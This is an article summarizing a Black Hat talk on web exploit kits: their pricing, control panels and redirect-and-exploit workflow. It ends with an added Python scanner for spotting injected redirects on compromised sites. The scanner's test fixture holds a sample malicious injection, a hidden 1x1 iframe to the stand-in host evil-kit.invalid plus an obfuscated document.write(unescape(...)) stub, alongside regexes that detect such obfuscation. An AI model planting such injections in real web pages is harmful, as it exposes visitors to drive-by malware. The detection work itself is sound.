
The State of Web Exploit Toolkits – Turnkey Cybercrime Software

During his Black Hat briefing, Jason Jones, the Team Lead for ASI (Advanced Security Intelligence) at HP DVLabs, presents an extensive analysis of present-day web exploit kits.

I’m going to be talking about the state of web exploit toolkits, which is a lot of what I’ve been doing on my job. I’m the Lead for the Advanced Security Intelligence Team at HP DVLabs. A lot of my job is dealing with malware: analyzing it, trying to figure out ways to determine reputation. We do a lot of malicious content harvesting. And web exploit toolkits are becoming more popular, more prevalent in the wild – it’s something that popped up on my radar and became a very interesting topic for me to continue researching.

What are web exploit kits?

If you’re not familiar with them, web exploit toolkits are pre-packaged software that generally consists of an installer; a lot of them are PHP-based and they have a database backend, normally MySQL. They include a large number of exploits, and most of these exploits actually target known vulnerabilities that are already patched and are rarely 0-day. There is one instance of a 0-day vulnerability being in these things.

Another interesting and important thing is that we can actually get some of these PHP files in raw form, but they are using the ionCube PHP Encoder, which encrypts a PHP file so that it’s difficult to recover. There are services out there that claim to be able to decrypt this encoding, but we have never found any that actually work.

A lot of these also have fancy control panels where you can go through and they’ll show statistics about what countries your visitors are coming from, what browsers they are using, which exploits have been launched and which were successful. So, you can get quite a bit of information from that. And then you can also configure which exploits you want to use and which payloads you actually want to launch. So, it ends up being very similar to a normal web application. Where they differ is that their whole goal is to install a malicious payload, some piece of malware. They have been used a lot to build up botnets, Trojans, fake AV, ransomware type of stuff. At the end of the day, it’s just a way for any cyber criminal to easily build something up and make money.

Characteristics of web exploits toolkits

A lot of these kits can cost thousands of dollars; some of them are free but some of them are very expensive. You can also do rentals: daily, weekly, monthly type of stuff. And they actually do a similar model where maybe a day costs $100, but a week costs $500; so they’ll offer you a discount to try to get you to go up. They also do bullet-proof hosting, which is hosting on their own servers where you are not going to get taken down, because it’s hosted by cyber criminals, so they are not going to obey law enforcement’s request to remove it.

And a lot of times they’ll contain agreements like EULAs stating that you have permission to do this with their kit, you cannot resell it, you cannot disclose what’s in it – it’s like what you’d expect to see with normal software. And that’s where it becomes really interesting, because the economy is built up like a legitimate software business, but in the underground. It gets really interesting because there’s also marketing and competitiveness between kits, where one kit will say: “We’re better than this kit because we have exploits A, B and C”, and the other kit will say: “Well, they stole those from us”. So it’s just like the whole back and forth between these guys.

The other way that they mimic normal software is that they do a lot of bug fixes; they do reliability updates for exploits if people complain; and they also do aesthetic changes when a new version comes out, like “Oh, we added a new spinner into our control panel; we made the statistics look nicer”. So it ends up being very interesting just from that perspective of there being a feedback loop between them and their customers.

A listing of active web exploit toolkits, according to Kahu Security

This (see left-hand graphic) is an image that I borrowed from Kahu Security’s blog, whose author talks a lot about these things and who has definitely been someone who – if I’m kind of stuck on something and I’m trying to find something new, trying to verify a trend – is one of the guys who has been of big help. So, he’s talking about a lot of the active kits that are out there. I’m going to talk about BlackHole a lot, also Phoenix; you also see some of the older kits like Eleonore or Bleedinglife; and you also see RedKit, which I don’t cover, but I believe it has some bytecode obfuscation for its Java exploits, so there are some other interesting features that are coming around in these kits.

How it works

So, the typical way these kits work (see right-hand image) is this. You see here the red exploit kit server. They’ll normally try to go out and find a vulnerable website; they’ll attempt to compromise it and inject malicious JavaScript that ends up redirecting any potential visitor of that site to this other site. Then they’ll do the typical browser detection to see if they have an exploit for the browser version you are running; so, if you’re running a plugin that they have exploits for, then they’ll attempt to exploit you. Then they’ll end up loading their malware. You can also go to the control panel on this kit and actually see a list of everyone who you’ve compromised, and you can also manage them from there.
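The first stage described above, injected JavaScript or a hidden iframe on a compromised legitimate site that silently sends visitors to the kit server, is the part a site owner or incident responder can look for in their own pages. The following scanner is an added example, not code from the talk or from HP DVLabs; it flags hidden off-site iframes and inline scripts that combine a decode-and-execute call with a long run of escaped bytes. The sample pages and the host name `evil-kit.invalid` are constructed for the demonstration.

```python
"""Heuristic scan of an HTML page for the injected redirect stage
that exploit-kit operators plant on compromised sites (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that hide an element from the visitor.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Decode-and-execute constructs typical of injected redirect stubs.
OBFUSCATION = re.compile(
    r"\b(eval|unescape|document\.write|String\.fromCharCode)\s*\(", re.I)
# A run of at least eight percent- or hex-escaped bytes.
ESCAPED_RUN = re.compile(r"(%[0-9a-f]{2}){8,}|(\\x[0-9a-f]{2}){8,}", re.I)


class _Collector(HTMLParser):
    """Collects iframe attributes and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []      # one attribute dict per <iframe>
        self.scripts = []      # one string per inline <script> body
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))


def _is_tiny(value):
    """True for width/height values of 0 or 1 (pixel suffix tolerated)."""
    try:
        return int(str(value).rstrip("px")) <= 1
    except ValueError:
        return False


def find_suspicious_injections(html, page_host):
    """Return findings for a page served from page_host.

    An iframe is reported when it is hidden (style or 1x1 size) AND points
    to a different host; a script is reported when it both uses a
    decode/execute call and carries a long escaped-byte run."""
    collector = _Collector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or page_host
        hidden = (HIDDEN_STYLE.search(attrs.get("style") or "")
                  or _is_tiny(attrs.get("width"))
                  or _is_tiny(attrs.get("height")))
        if hidden and host != page_host:
            findings.append({"kind": "hidden_offsite_iframe", "target": host})
    for body in collector.scripts:
        if OBFUSCATION.search(body) and ESCAPED_RUN.search(body):
            findings.append({"kind": "obfuscated_script",
                             "snippet": body.strip()[:60]})
    return findings


# Constructed sample pages: a clean page and the same page with an injected
# hidden iframe plus an obfuscated document.write stub appended.
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="https://example.com/news" width="600" height="400"></iframe>
<script>document.getElementById('x');</script>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://evil-kit.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22'));</script>
</body>""")

if __name__ == "__main__":
    for finding in find_suspicious_injections(INJECTED_PAGE, "example.com"):
        print(finding)
```

The two conditions are deliberately combined (hidden and off-site; decode call and escaped run) so that ordinary analytics iframes or a lone `document.write` on a legitimate page do not trip the check; anything it does report is worth pulling the page source and comparing against a known-good copy.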

Read next: The State of Web Exploit Toolkits 2: BlackHole Kit Scrutinized
